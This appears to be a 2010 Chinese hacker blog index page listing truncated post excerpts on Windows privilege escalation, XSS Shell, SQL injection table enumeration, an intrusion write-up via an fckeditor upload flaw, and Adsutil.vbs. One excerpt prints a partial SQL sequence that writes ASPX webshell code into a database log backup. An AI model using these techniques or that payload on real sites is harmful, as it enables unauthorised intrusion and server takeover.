黑客笔记开通QQ交流群  [顶]

欢迎支持黑笔的朋友加入。。呵呵 QQ群：21703493(满员) QQ群：9622179 ps:一群满员咯。。过几天朋友升级成超级群。。嘿嘿。。加油 ......

Posted by 小冰 | On 2010/9/3 | Comments 1 | Read 287 | Category 站长随笔

关于友情链接。  [顶]

我认为友情链接首先体现在友情上，如果你跟我不认识，那还做什么友情链接？如果你跟我仅仅是出现在彼此的IM联系人列表里，那称得上友情吗？ 最好你的站有点PR，有点访问量，优先考虑。 最后我不想我的博客变成网址导航！ 跟我做了友情链接的,不管因为什么原因,你去......

Posted by 小冰 | On 2010/5/22 | Comments 9 | Read 657 | Category 站长随笔

MS Windows Token Kidnapping(PR提权大杀器)本地提权的解决方案

Author:刺 昨天放出来的exp让大家狠狠的爽了一把吧，听说有人连续提权了十多台webshell的。今天MS更新了安全公告这个漏洞是由于在NetworkService或者LocalService下运行的代码，可以访问同样是在NetworkService或者LocalService下运行的进程，某些进程允许提升权限为Lo......

Posted by 小新 | On 2010/9/3 | Comments 1 | Read 47 | Category 黑客笔记

另类跨站攻击工具XSS Shell  [荐]

本篇文章源自《黑客防线》2007年3月刊转载请注明版权================================ XSS跨站脚本攻击属于被动式攻击，对于急于求成的朋友来说，往往不会被重视，而喜欢挂马的朋友则喜爱有加。通过构造特殊的页面，再把调用该页面的代码嵌在被攻击者网......

Posted by 小冰 | On 2010/9/3 | Comments 0 | Read 35 | Category 黑客笔记

runas 命令的使用及RUNAS自动输入密码的方法

在win2k中，开始→程序→附件，找到计算器，按住shift键，点右键，选择“运行方式...”，这时候，会弹出对话框，询问你要使用哪个用户身份来运行该程序。不知道大家是否使用过win2k的这个功能，如果大家是使用win2k的英文版本的话，在按住shift后选择的就不是“运行方式......

Posted by 小冰 | On 2010/9/3 | Comments 0 | Read 25 | Category 黑客笔记

用户权限不够无法运行程序的解决方法

一、Runas命令通过系统自带的Runas命令可以实现以其它用户权限来启动程序的功能，缺点是必需手动输入用户密码，在本故障中，本方法不适用。（使用程序文件上的右键菜单“运行方式”中的“运行身份”方法为此方法的图形窗口方式）runas/user:(用户)(命令) 二、第三方工具......

Posted by 小冰 | On 2010/9/3 | Comments 0 | Read 30 | Category 黑客笔记

ASP.NET网站注入备份db日志获得webshell

alterdatabasepubssetRECOVERYFULL createtablepubs.dbo.cmd(aimage) backuplogpubstodisk='c:\TM'withinit insertintopubs.dbo.cmd(a)values('<%@PageLanguage="C#"validateRequest="false"%><%System.IO.StreamWriterow=newSystem.IO.StreamWriter(Se......

Posted by 小冰 | On 2010/9/3 | Comments 0 | Read 31 | Category 黑客笔记

某网站安全检测记

作者：814ckhum0r 1、整体思路： 在目标网站服务器禁用了asp解析导致aspshell无法执行的情况下通过域名注册信息得到技术管理员邮箱，通过此邮箱信息得知此邮箱同时注册了另外一个域名cdxxx.cn，利用fckeditor二次上传漏洞入侵此网站(cdxxx.cn)获取webshell，发现此......

Posted by 小冰 | On 2010/9/3 | Comments 1 | Read 98 | Category 黑客笔记

Adsutil.vbs在脚本入侵中的妙用  [荐]

很基础的很老的一个文章。。但是很经典。。。希望大家多多了解点基础。。 适合读者：脚本攻击爱好者、网管前置知识：SQLInjection一般方法Adsutil.vbs在脚本入侵中的妙用文/图我非我 适合读者：脚本攻击爱好者、网管 前置知识：SQLInjection一般方法......

Posted by 小冰 | On 2010/9/1 | Comments 2 | Read 130 | Category 黑客笔记

当sysobjects表无select权限时暴表

主要就两点，sysobjects表与syscolumns表都无select权限时，得到表名与列名。以前BLOG里写过，要不是某黑客发来一我等小菜从没接触过的CFM程序的一个注入点让解决获取表名的难题，我都要忘了，顺便再重记一次。sysobjects表没有权限。如何暴表?所有的表名都只存在了syso......

Posted by 小冰 | On 2010/8/31 | Comments 0 | Read 74 | Category 黑客笔记